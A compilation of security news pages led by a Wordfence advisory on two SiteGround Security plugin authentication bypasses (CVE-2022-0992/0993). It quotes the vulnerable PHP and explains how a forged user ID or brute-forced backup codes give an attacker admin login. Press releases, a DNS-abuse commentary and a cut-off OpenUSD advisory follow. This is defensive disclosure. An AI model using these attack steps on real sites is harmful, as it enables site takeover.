The SiteGround Security plugin for WordPress is vulnerable to authentication bypass that allows unauthenticated users to log in as administrative users due to missing identity verification on initial 2FA set-up that allows unauthenticated and unauthorized users to configure 2FA for pending accounts. Upon successful configuration, the attacker is logged in as that user without access to a username/password pair which is the expected first form of authentication. This affects versions up to, and including, 1.2.5.

On March 10, 2022 the Wordfence Threat Intelligence team initiated the responsible disclosure process for a vulnerability we discovered in “SiteGround Security”, a WordPress plugin that is installed on over 400,000 sites. This flaw makes it possible for attackers to gain administrative user access on vulnerable sites when two-factor authentication (2FA) is enabled but not yet configured for an administrator.

Wordfence Premium, Wordfence Care, and Wordfence Response received a set of firewall rules on March 10, 2022 to provide protection against any attackers trying to exploit this vulnerability. Wordfence Free users will receive this same protection 30 days later on April 9, 2022

After sending the full disclosure details to the SiteGround security team on March 10, 2022 a patch was released the next day on March 11, 2022. While the plugin was partially patched immediately, it wasn’t optimally patched until April 7, 2022.

Sites hosted on the SiteGround platform have automatically been updated to the patched version while those hosted elsewhere will require a manual update, if auto-updates are not enabled for the plugin. We strongly recommend ensuring that your site has been updated to the latest patched version of “SiteGround Security”, which is version 1.2.6 at the time of this publication.

**Description:** Authentication Bypass via 2-Factor Authentication Setup  
**Affected Plugin:** SiteGround Security  
**Plugin Slug:** sg-security  
**Plugin Developer:** SiteGround  
**Affected Versions:** <= 1.2.5  
**CVE ID:** CVE-2022-0992  
**CVSS Score:** 9.8 (Critical)  
**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  
**Researcher/s:** Chloe Chamberland  
**Fully Patched Version:** ​1.2.6

SiteGround Security is a plugin designed to enhance the security of WordPress installations via several features like login security including 2FA, general WordPress hardening, activity monitoring, and more. It’s also worth noting that it comes pre-installed on all SiteGround hosted WordPress sites. Unfortunately, the 2FA functionality of the plugin was insecurely implemented making it possible for unauthenticated attackers to gain access to privileged accounts.

When two-factor authentication is enabled, it requires all administrative and editor users to set-up two factor authentication. This requirement is triggered when the site’s administrative and editor users log into the site for the first time after 2FA has been enabled at which time they are prompted to configure 2FA for their account. This means that there will be a period of time between 2FA being enabled on a site and each user configuring it for the account.

During this interim period, attackers could hijack the 2FA set-up process. The plugin had a flaw that made it so that attackers could completely bypass the first step of authentication, which requires a username and password, and access the 2FA set-up page for users that had not configured 2FA yet.

It was as simple as supplying the user ID they would like to compromise via the sg-user-id parameter, along with a few other parameters to indicate that they would like to trigger the initial 2FA configuration process.

The following validate_2fa_login() function shows the process by which a user-supplied ID is validated. If the results from the check_authentication_code() function and the sg_security_2fa_configured user meta retuned false, which indicated that 2FA hasn’t yet been configured for that user, then the plugin would load the 2fa-initial-setup-form.php template which displays the QR code and 2FA secret needed to configure the authenticator app for the user supplied ID.

</pre>
<pre>public function validate\_2fa\_login( $user ) {
   // Bail if there is no valid user authentication.
   if ( ! isset( $\_POST\['sg-user-id'\] ) ) { // phpcs:ignore
      return;
   }

   $result = $this->check\_authentication\_code( wp\_unslash( $\_POST\['sgc2facode'\] ), wp\_unslash( $\_POST\['sg-user-id'\] ) ); // phpcs:ignore

   // Check the result of the authtication.
   if ( false === $result ) {
      if ( 0 == get\_user\_meta( $\_POST\['sg-user-id'\], 'sg\_security\_2fa\_configured', true ) ) { // phpcs:ignore
         // Arguments for initial 2fa setup.
         $args = array(
            'template' => '2fa-initial-setup-form.php',
            'qr'       => get\_user\_meta( $\_POST\['sg-user-id'\], 'sg\_security\_2fa\_qr', true ), // phpcs:ignore
            'secret'   => get\_user\_meta( $\_POST\['sg-user-id'\], 'sg\_security\_2fa\_secret', true ), // phpcs:ignore
            'error'    => esc\_html\_\_( 'Invalid verification code!', 'sg-security' ),
            'action'   => esc\_url( add\_query\_arg( 'action', 'sgs2fa', wp\_login\_url() ) ),
         );
      } else {
         // Arguments for 2fa login.
         $args = array(
            'template' => '2fa-login.php',
            'error'    => esc\_html\_\_( 'Invalid verification code!', 'sg-security' ),
            'action'   => esc\_url( add\_query\_arg( 'action', 'sgs2fa', wp\_login\_url() ) ),
         );
      }

      $this->load\_form( wp\_unslash( $\_POST\['sg-user-id'\] ), $args ); // phpcs:ignore
   }

   // Set the auth cookie.
   wp\_set\_auth\_cookie( wp\_unslash( $\_POST\['sg-user-id'\] ), intval( wp\_unslash( $\_POST\['rememberme'\] ) ) ); // phpcs:ignore</pre>
<pre>

_The authentication QR code and secret key displayed that would be displayed to potentially unauthorized users._

The returned QR code and secret key are the only things needed to connect the user account with an authentication mechanism, such as Google Authenticator. Attackers were able to use this to connect their authentication app with the account and successfully use a code to pass the “second factor of authentication.” This function would then set the user authentication cookies via the wp_set_auth_cookie() function using the user supplied ID from the sg-user-id parameter which effectively logs the attacker in as that user. Due to the default configuration of the plugin, this account would most likely be a privileged user like an administrator or editor. It’s also worth noting that the function returns the back-up codes which could be used via the weakness outlined in the next section.

To sum it up, there was no validation on the validate_2fa_login() function that the identity a user was claiming was in fact legitimate. As such attackers could bypass the first authentication mechanism, a username/password pair, which is meant to prove identity and successfully log in, due to a weakness in the second authentication mechanism, the 2FA process. When successful, an attacker could completely infect a site by exploiting this vulnerability.

**Description:** Authorization Weakness to Authentication Bypass via 2-Factor Authentication Back-up Codes  
**Affected Plugin:** SiteGround Security  
**Plugin Slug:** sg-security  
**Plugin Developer:** SiteGround  
**Affected Versions:** <= 1.2.4  
**CVE ID:** CVE-2022-0993  
**CVSS Score:** 8.1 (High)  
**CVSS Vector:** CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H  
**Researcher/s:** Chloe Chamberland  
**Fully Patched Version:** ​1.2.6

In addition to the above outlined vulnerability, the method in which 2FA back-up code authentication was handled made it possible for attackers to log in if they were able to brute force a back-up code for a user or compromise it via other means such as SQL Injection.

Diving deeper, the plugin registered the validate_2fabc_login() function which validated the supplied backup code through the validate_backup_login() function using the user supplied user ID from the sg-user-id parameter along with the back-up code supplied via the sgc2fabackupcode parameter. If the back-up code was found in the array of stored back-up codes for that user, then the function would use the wp_set_auth_cookie() function to set the authentication cookies for the supplied user ID. If that user ID belonged to an administrator, the attacker would effectively be logged in as an administrator.

</pre>
<pre>public function validate\_2fabc\_login() {

   $result = $this->validate\_backup\_login( wp\_unslash( $\_POST\['sgc2fabackupcode'\] ), wp\_unslash( $\_POST\['sg-user-id'\] ) ); // phpcs:ignore

   // Check the result of the authtication.
   if ( false === $result ) {
      $this->load\_form(
         wp\_unslash( $\_POST\['sg-user-id'\] ), // phpcs:ignore
         array(
            'template' => '2fa-login-backup-code.php',
            'action'   => esc\_url( add\_query\_arg( 'action', 'sgs2fabc', wp\_login\_url() ) ),
            'error'    => esc\_html\_\_( 'Invalid backup code!', 'sg-security' ),
         )
      );
   }

   // Set the auth cookie.
   wp\_set\_auth\_cookie( wp\_unslash( $\_POST\['sg-user-id'\] ), intval( wp\_unslash( $\_POST\['rememberme'\] ) ) ); // phpcs:ignore

Similarly to the previous vulnerability, the issue here is that there was no true identity validation for the authentication, which indicates an authorization weakness. The function performed no checks to verify that a user had previously authenticated prior to entering the 2FA back-up code, and as such they did not need to legitimately log in prior to being logged in while using a back-up code. This meant that there were no checks to validate that a user was authorized to use a back-up code to perform the second factor of authentication that would log them in.

Though the risk in this case is lower, the backup codes were 8 digits long and entirely numeric, so an attacker could potentially brute force one of the 8 back-up codes and automatically be logged in without knowing a username and password combination for an administrative user.

While this might not be practical to attempt on most servers, a patient adversary attacking a well-provisioned server capable of processing a large number of requests at once would have a high chance of eventually gaining access unless the brute force attempts were stopped by another mechanism, such as the Wordfence plugin’s built-in brute force protection or rate limiting rules.

Further, this vulnerability could be used in conjunction with another vulnerability, such as SQL injection, where an attacker would be able to compromise the 2FA back-up codes that are stored in the database and then subsequently use them to log in without needing to crack the password of an administrative user which would likely be significantly stronger. In both cases, the impact would be significant as an attacker could gain administrative access to the compromised WordPress site which could be used for complete site infection.

**An Important Security Reminder: Audit Your WordPress Site’s User Accounts**

This vulnerability serves as an important reminder to audit your WordPress site’s user accounts. This means identifying any old and unused user accounts that have been inactive for an extended period of time and/or are likely to never be used again and removing them or completely stripping the user’s capabilities. This vulnerability could easily be exploited on sites where the site owner enabled 2FA, which is required for all administrative and editor users, and had old inactive administrative/editor user accounts on the site that an attacker could target. Considering accounts that are no longer active are unlikely to log in after the 2FA setting has been enabled, the 2FA for those accounts would not be configured leaving the site ripe for exploitation by any attackers exploiting the vulnerability.

A situation involving a similar security issue involving insecure 2FA was reported by the CISA in conjunction with the FBI a few weeks ago, around the same time we discovered this vulnerability. In the Cybersecurity Advisory (CSA) by the CISA, it was disclosed that a threat actor was able to successfully brute force a dormant user’s account credentials, and due to a default 2FA setting that would allow dormant users to re-enroll a new device for 2FA during the next active log in, the threat actor was able to connect the 2FA secret to their own account and retrieve the code needed to pass the second factor of authentication. Once the threat actor gained initial access to the system they were able to escalate their privileges by exploiting the “PrintNightmare” vulnerability, which you can read more about here, and steal sensitive information from across the organization’s network. This goes to show that attackers are definitely looking for flaws like the one disclosed today to exploit and any site can be a target. As such, it’s important to actively maintain and validate the security of your site through regularly performed professional or self-conducted security audits and penetration tests, which is a service Wordfence provides. Security is an active and continuous process.

**Timeline**

**March 10, 2022** – Conclusion of the plugin analysis that led to the discovery of two Authentication Bypass Vulnerabilities in the “SiteGround Security” WordPress plugin. We deploy firewall rules to protect Wordfence Premium, Wordfence Care, and Wordfence Response users. We send the full disclosure details to SiteGround in accordance with their responsible disclosure policy.  
**March 11, 2022** – The CTO of SiteGround responds indicating that a patch has been released. We review the patch and inform them that it is insufficient. They release an additional patch.  
**March 11, 2022** – A patched version of the plugin is released as version 1.2.3. We suggest further security enhancements to the functionality.  
**March 16, 2022** – An update is made that reduces the security of the 2FA functionality, we follow-up again to suggest better security enhancements to the functionality. The CTO assures us that they are working on it.  
**April 6, 2022** – A fully and optimally patched version of the plugin is released as version 1.2.6.  
**April 9, 2022** – Wordfence Free users receive the firewall rules.

**Conclusion**

In today’s post, we detailed a flaw in the “SiteGround Security” plugin that made it possible for unauthenticated attackers to gain access to administrative user accounts in instances where 2-Factor Authentication was enabled, though not yet fully set up, and in cases where an attacker could successfully brute force a back-up code. This could easily be used by an attacker to completely compromise a site. This flaw has been fully patched in version 1.2.6.

We strongly recommend ensuring that your site has been updated to the latest patched version of “SiteGround Security”, which is version 1.2.6 at the time of this publication.

Wordfence Premium, Wordfence Care, and Wordfence Response received a set of firewall rules on March 10, 2022 to provide protection against attempts by attackers to exploit this vulnerability. Wordfence Free users will receive this same protection 30 days later on April 9, 2022

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both Wordfence Care and Wordfence Response include hands-on security support that provide you with ongoing assistance from our incident response team, should you need it.

_Special thanks to the team at SiteGround, for responding swiftly and working quickly to get a patch out to protect their customers and working to further secure the 2FA component._

CVE-2022-0992: Critical Authentication Bypass Vulnerability Patched in SiteGround Security Plugin

Provides autonomous and uninterrupted monitoring of unmanned IT locations at scale.

**AUSTIN, Texas, April 19, 2022**—RF Code, a pioneer of automated, real-time physical asset lifecycle management and environmental monitoring solutions for data centers, today announced the launch of Sentry, the company's first Software-as-a-Service (SaaS) innovation for decentralized edge computing locations. Sentry provides autonomous and uninterrupted monitoring of unmanned IT locations at scale. With deep intelligence and real-time notifications, Sentry makes it easier for IT professionals to monitor all of their remote IT spaces without being on-site.

"I can honestly say the Sentry device from RF Code will be an industry game-changer," said John Fletcher, Lead Technology Analyst for a major U.S. retail IT firm. "You get three monitoring devices in one unit ... temperature, humidity, and camera monitoring. Sentry is very easy to set up and cost-effective for our team's budget. It has real-time visual access and rich data of each IT environment that we're monitoring. It also has thermal scanning so I can check any room that houses critical IT equipment for potential hotspots that would cause an outage in the future.”

With the increased adoption of IoT devices, autonomous vehicles, as well as new work-from-anywhere (WFA) models, data center functions are moving to the edge to support these compute-intensive, zero-latency applications, and the demands of an increasingly remote workforce. By implementing a decentralized architecture, organizations like retailers, hospitals, hotels, manufacturers, and banks can improve localized computing power for end-users and the applications they need to drive business.

Without real-time environmental and critical asset monitoring tools in place, these unmanned and unmonitored IT spaces can be costly. Unplanned downtime, theft, and breaches can hurt an organization's bottom line costing thousands of dollars a minute.

"We developed Sentry as a way to meet the needs of a broader, underserved edge market with a simple, scalable, and affordable real-time IT asset and environmental monitoring solution," said Dale Quayle, CEO, RF Code. "Enterprises of all sizes need the ability to see, hear, and secure these edge environments as though they're onsite and Sentry makes it easier to prevent, mitigate, or remediate IT situations that threaten to disrupt normal business operations—from air quality and overheating to unauthorized access and other potential threats."

Sentry is easy to install and can be deployed in 20 minutes—all without the need for an on-site IT team, providing real-time visibility and remote monitoring from anywhere. Sentry's SaaS model makes it more affordable for organizations to monitor several IT locations at scale.

For more information and to see how Sentry monitors and secures remote edge locations, please visit http://rfcode.com/sentry.

**About RF Code**  
RF Code is an innovator of autonomous critical asset intelligence solutions. RF Code's real-time, active RFID technology improves IT asset tracking accuracy, full lifecycle management, and inventory utilization at data centers and edge locations. Autonomous IT asset data tracking and enhancement help RF Code customers slash manual error costs, optimize processes, maintain uptime, and comply with regulatory requirements. With patented wire-free active RFID sensors, open APIs, and real-time reporting capabilities, RF Code can be easily integrated with existing IT, facilities, and business systems.

RF Code is based in Austin, TX, and serves more than 200 organizations worldwide including Fortune 500, systems integrators, and value-added resellers. Additional information can be found at http://www.rfcode.com.

  

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

RF Code Announces Sentry, a New Edge Solution for Remote Locations

From higher standards in top-level domains to increased adoption of security controls, stepped-up measures can help fight DNS abuse and protect Web domains.

When the European Union introduced General Data Protection Regulation (GDPR) guidance several years ago to address privacy concerns, it became the genesis of a worldwide movement that led to an increased focus on privacy issues. Similarly, the EU recently released guidance on a security issue that still doesn't get the focus that it should — DNS abuse.

The Domain Name System (DNS) is a hierarchical and decentralized naming system used to identify computers, services, and other resources reachable through the Internet or other Internet Protocol (IP) networks. Specifically, DNS abuse is any activity that makes use of domain names or the DNS protocol to carry out harmful or illegal activity. Malicious activities on the DNS have been a frequent and serious issue for years, affecting online security, undermining trust on the Internet, and causing harm to users and third parties. This type of abuse also includes cybersecurity threats and the distribution of illegal and harmful materials.

While many organizations are aware of traditional approaches to cybersecurity, the one area that consistently gets ignored is maintaining and protecting Web domains. Inaction leads to issues such as DNS hijacking, which redirects employees, partners, and customers to sites that put them at risk or steal sensitive data. When legitimate domains are compromised, cybercriminals bypass traditional security, making it more difficult to identify, mitigate, and block such users. Fraudsters also use malicious domains (e.g., homoglyphs or confusingly similarly named domains or subdomains) and email spoofing to commit fraud and intellectual property abuse.

To date, there is no global consensus on what should be done to prevent or fight DNS abuse, and there are no policies in place to hold domain registrars to higher validation standards in terms of ownership. Upholding and preserving a reliable, resilient, and secure DNS is a key factor in maintaining the integrity of the Internet and is essential for its continuous and stable operation, on which the digital economy and society depend.

To address this, the European Commission recently conducted a study and issued this report, which assessed the scope, impact, and magnitude of DNS abuse, and also provided input for possible policy measures based on identified gaps. Analysis was completed of the available data and the report proposed a set of recommendations to prevent, detect, and mitigate DNS abuse.

**DNS Report Takeaways  
**While this report is compelling and provides guidance to follow, there are key components of it that enterprises should home in on when looking to improve the domain security posture of their organization. Specifically, the report recommends the following:  

*   **Selecting providers with more validation standards for domain registrations.  
    **We need to hold domain registrars to higher standards. They need to take a customer validation approach that verifies who the customer is to ensure abuse isn't happening. This "know your customer" strategy is used in enterprises today to mitigate fraud, and in this instance, it can bring a level of compliance to a situation where cybercriminals are currently registering any new domain whenever they want to.

*   **Initiate prevention and remediation solutions.  
    **Free hosting and subdomains, services that were originally intended for legitimate services, are commonly exploited in phishing attacks. Companies should activate proactive detection of suspicious domain names containing targeted brand keywords. Additionally, they should monitor the domain and DNS space for brand abuse, infringement, and fraud. Trusted notifier programs should be developed so that enterprises can enforce their rights through reporting and suspending offending domains.

*   **Increase adoption of security controls.  
    **Domain name system security extensions (DNSSEC) can authenticate communication between DNS servers. However, low adoption and lack of deployment can lead to hackers taking control of an Internet browsing session and redirecting users to deceptive websites. SPF and DMARC protocols should continually be adopted as the first line of defense against business email compromise (BEC) as those protocols can mitigate email spoofing. Just as crucial to security is to enable registry locks. While **t**his area wasn't discussed in the European Commission report, it's a great way to prevent attacks, as it enables end-to-end domain name transaction security to mitigate human error and third-party risk. Most large registries in Europe, such as those in Germany, France, and Sweden, have adopted this security measure, but it's not consistent, with notable exceptions such as Italy and Spain. Unlocked domains are vulnerable to social engineering tactics, which can lead to unauthorized DNS changes and domain name hijacking.

*   **Better standards in top-level domains (TLDs).  
    **A TLD is the final component of a domain name (.org, .icu). The generic TLDs (gTLDs) are the most abused domains by volume. However, some new gTLDs and country code TLDs (ccTLDs) have a higher concentration of fraud. You can get a TLD for less than a dollar these days, and phishers love this easy accessibility. There needs to be further consideration of tools and measures that safeguard intellectual property rights and consumer safety in a cost-effective and scalable way. One example is blocking programs — leveraged by the Donuts DPML program — which could reduce DNS abuse. Donuts, a part of the gTLD program, offers a blocking service for trademark holders known as the Domain Protected Marks List, or DPML.

**Building Domain Standards  
**While the EU report provides great insights into how to better mitigate threats to domains, it should serve as a foundational piece upon which companies and countries around the world can build.

As domain standards evolve, it will be important for government and industry to develop effective policies and programs to ensure that Web users aren't at risk of crime and fraud during their daily lives. Simultaneously, limiting hackers' ability to operate and maliciously commit fraud will be vital to our society and digital economy.

How to Interpret the EU's Guidance on DNS Abuse Worldwide

Swimlane’s Asia-Pacific presence grows 173%, highlighting rising demand for low-code security automation.

DENVER--(BUSINESS WIRE)--Swimlane, the leader in low-code security automation, today announced the general availability of Swimlane Cloud in the Asia-Pacific Japan (APJ) region. This deployment is further evidence of Swimlane’s continued commitment to empowering APJ customers to enable new use cases previously not possible with traditional security orchestration, automation and response (SOAR). This includes unlocking the use of automation beyond the SOC, where Swimlane serves as the system-of-record for the entire security organization.

**Meeting the APJ Staffing Shortage Head-On with Swimlane Cloud**  
The APJ region faces a significant cybersecurity talent shortage with an estimated 2.045 million open cybersecurity roles, accounting for 66% of the total global shortage, signaling the struggle to find qualified, skilled professionals to handle increasing security alerts. Without automation, these overburdened security administrators must manually perform repetitive and time-consuming tasks needed to track, mitigate and resolve security events across multiple security platforms. Despite significant time investments, security teams cannot realistically analyze and adequately prioritize security alerts and events at the rate necessary to protect networks.

“In order to mature our security operations, we knew it was necessary to advance how we monitor and respond to threat intelligence by taking a more proactive approach to security operations,” said Tanajak Watanakij, CISO, R V Connex. “With our existing talent pool, we turned to Swimlane’s low-code security automation offering to create a centralized system of record for our Security Operations Center (SOC) and remove dependencies on a host of manual processes. Swimlane’s interactive dashboards and automated, easily customizable workflows reduced our mean time to respond and ultimately helped us ensure continuous compliance and prevent breaches across the entire R V Connex Corporation and our MSSP customers.”

“Security teams across APJ need solutions that reduce the manual operations needed to respond to security threats and speed up incident response,” said Johan Wikenstedt, Vice President of Asia Pacific and Japan (APJ) for Swimlane. “We are a customer-focused company with a powerful platform for helping companies ease the burden security teams face daily. Swimlane is fully dedicated to supporting the region’s ongoing cybersecurity challenges through the adoption of low-code security automation.”

**Demand for Low-Code Automation Continues to Climb**  
Swimlane’s current product initiatives in APJ continue to drive regional market traction highlighted by:

*   173% revenue growth of regional presence in the past four months, with more than 7x revenue growth in the past 6 months.
*   142% growth of regional employee headcount in the past six months.
*   New sales offices established in Australia, Malaysia and South Korea.
*   Net-new customer adoption in Australia, Bangladesh, India, Japan, Malaysia, Philippines, Singapore, Thailand, and New Zealand.
*   Vertical expansion of customer adoption across banking, technology, financial services, government, MSSP, and manufacturing industries.
*   8 new go-to-market partners established in the region.

Lumen Technologies turned to Swimlane after experiencing a rapid period of growth that challenged the company’s security team to capacity. Swimlane’s low-code security automation platform allowed the organization to maintain the integrity of its security operations and quickly adapt to business growth across its SecOps infrastructure. Within the first quarter of implementing the solution, Lumen achieved a 30% automation level. Today, 70% of security events hitting the Security Operations Center (SOC) can be fully automated without human intervention.

“Swimlane was a partner from the start, helping us ensure the solution was easy to manage and operate and providing technical support whenever we needed,” said Wai Kit Cheah, Director of the Security Practice at Lumen Technologies. “With Swimlane’s robust automation engine, events can be processed from any source, enabling our security team to integrate security automation with user and entity behavior analytics (UEBA) and third-party threat intelligence feeds. This allowed us to achieve a holistic look at our ecosystem and has quickly made Swimlane’s platform an essential component of our SOC.”

**Swimlane Medley Partner Program Expands to Malaysia**  
Swimlane has invested significantly in Malaysia due to the region’s robust national cybersecurity strategy and world-class talent. As part of its growth in the region, Swimlane recently announced a partnership with CyberSecurity Malaysia, the national cyber security specialist agency under the purview of the Ministry of Communications and Multimedia Malaysia (KKMM), to assist the organization on its mission to build a more resilient cyber ecosystem throughout Malaysia.

“Our strategic partnership with Swimlane comes at an exciting time for CyberSecurity Malaysia as we seek to elevate a strategic cybersecurity vision for the region,” said Dato’ Ts. Dr. Haji Amirudin Abdul Wahab, CEO of CyberSecurity Malaysia. “Together, Swimlane and Cybersecurity Malaysia will leverage our combined experience, capabilities, and products to deliver innovative cybersecurity solutions across Malaysia and ensure companies in the region have access to the world’s most-capable low-code automation technology to safeguard their networks and data.”

**Join Swimlane at the SecOps Automation Summit 2022**  
Swimlane will hold the SecOps Automation Summit 2022 in South Korea, Malaysia and Australia in late April and early May. Presenters include Co-Founder and Chief Strategy Officer Cody Cornell and other members of the Swimlane team, along with various current partners and customers, to explore new and future innovations in the dynamic field of security automation.

To learn more about the summit and Swimlane’s expansion in the APJ region, visit https://swimlane.com/swimlane-helps-address-asia-pacifics-security-skills-shortage.

**About Swimlane**  
Swimlane is the leader in cloud-scale, low-code security automation. Supporting use cases beyond SOAR, Swimlane improves the ease with which security teams can overcome process and data fatigue, as well as chronic staffing shortages. Swimlane unlocks the potential of automation beyond the SOC by delivering a low-code platform that serves as the system-of-record for the entire security organization and enables anyone within the organization to contribute their knowledge and expertise to the protection of the organization. For more information, visit swimlane.com, swimlane.com/japan and swimlane.com/korea.

Swimlane Extends Cloud-Based Security Automation into APJ Amid Momentous Growth in Region

**VANCOUVER, British Columbia and SAN JOSE, Calif. — April 14, 2022 —** Absolute Software™ (NASDAQ: ABST) (TSX: ABST), a leader in self-healing endpoint and secure access solutions, today announced the availability of Absolute Ransomware Response, enabling customers to strengthen preparedness and accelerate endpoint recovery in the face of the ever-growing threat of ransomware attacks. With this new offering, part of the company’s Secure Endpoint product portfolio, organizations have the key capabilities and services needed to assess their ransomware preparedness and cyber hygiene across endpoints; ensure mission-critical security applications, such as anti-malware and device management tools, remain healthy and capable of self-healing; and expedite the quarantine and recovery of devices if an attack occurs.

Cybersecurity Ventures predicts that organizations will face a new ransomware attack every two seconds by 2031, up from every 11 seconds in 2021. While the top priority for IT and security teams has historically been securing and restoring critical infrastructure, such as servers and business applications, the accelerated adoption of ‘work-from-anywhere’ has significantly expanded the potential ransomware attack surface – and in turn, has increased the need to extend preparedness and recovery efforts to end user devices.

“The reality is that, while organizations are very concerned about the time to recover from ransomware attacks, they often solely focus on prevention tools, without planning for the worst-case scenario: falling victim to an attack,” said Eric Hanselman, Principal Research Analyst at 451 Research, part of S&P Global Market Intelligence, in a recent webinar. “By building a plan and improving their preparedness and simplifying the endpoint recovery process for their organizations, they can accelerate businesses’ ability to recover and resume operations.”1

“Ransomware is more prevalent, more sophisticated, and more capable of disruption and damage than ever and organizations need to plan for ‘when,’ not ‘if,’ they are successfully attacked,” said John Herrema, EVP of Product & Strategy at Absolute. “When a ransomware attack occurs, organizations are often forced to weigh the risks of cutting off all communication with an infected device, losing the ability to restore or recover it, or leaving the door open for re-infection. This new offering gives them the cyber resiliency needed to mitigate ransomware deployment techniques, restore and update tools critical to recovery, and if needed, hit the ‘kill switch’ – meaning they can wipe the device while still maintaining control so it can be recovered.”

Key capabilities and benefits available with Absolute’s new Ransomware Response offering include:

*   **Assess Strategic Readiness Across Endpoints**: Empower customers to review the existing security controls deployed across their endpoints, and identify key applications (e.g., anti-virus/anti-malware, endpoint protection, or endpoint detection and response) and device management tools required to minimize ransomware exposure and accelerate recovery efforts.
*   **Establish Cyber Hygiene and Resiliency Baseline:** Enable application resilience policies that monitor and self-heal the critical controls identified during the assessment phase, to both mitigate the risk of a successful ransomware attack and ensure that tools may be restored if an attack renders them inoperable. This also includes training customer personnel on how to monitor application health and apply these baseline resilience policies to new Absolute-enabled devices.
*   **Monitor Device Security Posture and Sensitive Data**: Allow customers to report on hardware and software inventory across their endpoints and assess overall device security posture. Scan for sensitive data – such as financial information, social security numbers, personally identifiable information (PII), protected health information (PHI), and intellectual property – to identify devices most at risk for data extraction and enable proper back-up via customers’ existing tools.
*   **Expedite Device Recovery and Limit Re-Infection**: Equip customers with the capabilities needed to communicate with end users even if their devices are compromised; quarantine and freeze endpoints to limit further spread of infection and preserve evidence for litigation purposes; restore endpoint security and device management tools that have been rendered inoperable; and execute custom workflow and task automation commands to expedite device recovery. In addition, Absolute experts are available to remotely assist customers with endpoint recovery efforts leveraging Absolute’s product capabilities.

Absolute Ransomware Response is available for purchase for new customers as part of the company’s Secure Endpoint product offerings. These capabilities are also available as add-on modules for existing Absolute Control and Resilience service tier customers. To learn more, visit here.

_\[1\] 2022 Data Theft Report Webinar by Eric Hanselman, 451 Research, part of S&P Global Market Intelligence, March 31, 2022_

**_Forward-Looking Statements_**

_This press release contains certain forward-looking statements and forward-looking information (collectively, “forward-looking statements”) which relate to future events or Absolute’s future business, operations, and financial performance and condition. Forward-looking statements normally contain words like “will”, “intend”, “anticipate”, “could”, “should”, “may”, “might”, “expect”, “estimate”, “forecast”, “plan”, “potential”, “project”, “assume”, “contemplate”, “believe”, “shall”, “scheduled”, and similar terms and, within this press release, include, without limitation, the statements regarding the ever-growing threat of ransomware attacks, the speed at which a business may recover from a ransomware attack and resume operations and ‘when’ or ‘if’ an organization may face a ransomware attack. Forward-looking statements are provided for the purpose of presenting information about management’s current expectations and plans relating to the future and allowing investors and others to get a better understanding of our anticipated financial position, results of operations, and operating environment. Readers are cautioned that such information may not be appropriate for other purposes._

_Forward-looking statements are not guarantees of future performance, actions, or developments and are based on expectations, assumptions and other factors that management currently believes are relevant, reasonable, and appropriate in the circumstances. The material expectations, assumptions, and other factors used in developing the forward-looking statements set out herein include or relate to the following, without limitation: Absolute will be able to successfully execute its plans, strategies, and objectives. Although management believes that the forward-looking statements herein are reasonable, actual results could be substantially different due to the risks and uncertainties associated with and inherent to Absolute’s business, as more particularly described in the “Risk and Uncertainties” section of Absolute’s most recently filed Management’s Discussion and Analysis, which is available at www.absolute.com and under Absolute’s profile on www.sedar.com. Additional material risks and uncertainties applicable to the forward-looking statements herein include, without limitation, unforeseen events, developments, or factors causing any of the aforesaid expectations, assumptions, and other factors ultimately being inaccurate or irrelevant. Many of these factors are beyond the control of Absolute._

_All forward-looking statements included in this press release are expressly qualified in their entirety by these cautionary statements. The forward-looking statements contained in this press release are made as at the date hereof and Absolute undertakes no obligation to update publicly or to revise any of the included forward-looking statements, whether as a result of new information, future events, or otherwise, except as may be required by applicable securities laws._

**About Absolute Software**

Absolute Software (NASDAQ: ABST) (TSX: ABST) is a leading provider of self-healing endpoint and secure access solutions, delivering truly resilient zero trust for today’s distributed workforces. Absolute is the only endpoint platform embedded in more than half a billion devices, offering a permanent digital connection that intelligently and dynamically applies visibility, control and self-healing capabilities to endpoints, applications, and network connections - helping customers to strengthen cyber resilience against the escalating threat of ransomware and malicious attacks. Trusted by nearly 16,000 customers, G2 recognized Absolute as a leader in Zero Trust Networking and Endpoint Management in the Winter of 2022.

©2022 Absolute Software Corporation. All rights reserved. ABSOLUTE, the ABSOLUTE logo, and NETMOTION are registered trademarks of Absolute Software Corporation or its subsidiaries. Other names or logos mentioned herein may be the trademarks of Absolute or their respective owners. The absence of the symbols ™ and ® in proximity to each trademark, or at all, herein is not a disclaimer of ownership of the related trademark.

Absolute Software Introduces Ransomware Response Offering

Zoho ManageEngine ADSelfService Plus before 6121, ADAuditPlus 7060, Exchange Reporter Plus 5701, and ADManagerPlus 7131 allow NTLM Hash disclosure during certain storage-path configuration steps.

CVE-2022-29457: ADSelfService Plus Release Notes

An exploitable vulnerability exists in the way Pixar OpenUSD 20.05 handles file offsets in binary USD files. A specially crafted malformed file can trigger an arbitrary out-of-bounds memory access that could lead to the disclosure of sensitive information. This vulnerability could be used to bypass mitigations and aid additional exploitation. To trigger this vulnerability, the victim needs to access an attacker-provided file.

**Summary**

An exploitable vulnerability exists in the way Pixar OpenUSD 20.05 handles file offsets in binary USD files. A specially crafted malformed file can trigger an arbitrary out-of-bounds memory access that could lead to the disclosure of sensitive information. This vulnerability could be used to bypass mitigations and aid additional exploitation. To trigger this vulnerability, the victim needs to access an attacker-provided file.

**Tested Versions**

Pixar OpenUSD 20.05  
Apple macOS Catalina 10.15.3

**Product URLs**

https://openusd.org

**CVSSv3 Score**

4.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

**CWE**

CWE-119 - Improper Restriction of Operations within the Bounds of a Memory Buffer

**Details**

OpenUSD stands for “Open Universal Scene Descriptor” and is a software suite by Pixar that facilitates, among other things, interchange of arbitrary 3-D scenes that may be composed of many elemental assets.

Most notably, USD and its backing file format `usd` are used on Apple iOS and macOS as part of ModelIO framework in support of SceneKit and ARKit for sharing and displaying 3D scenes in, for example, augmented reality applications. On macOS, these files are automatically rendered to generate thumbnails, while on iOS they can be shared via iMessage and opened with user interaction.

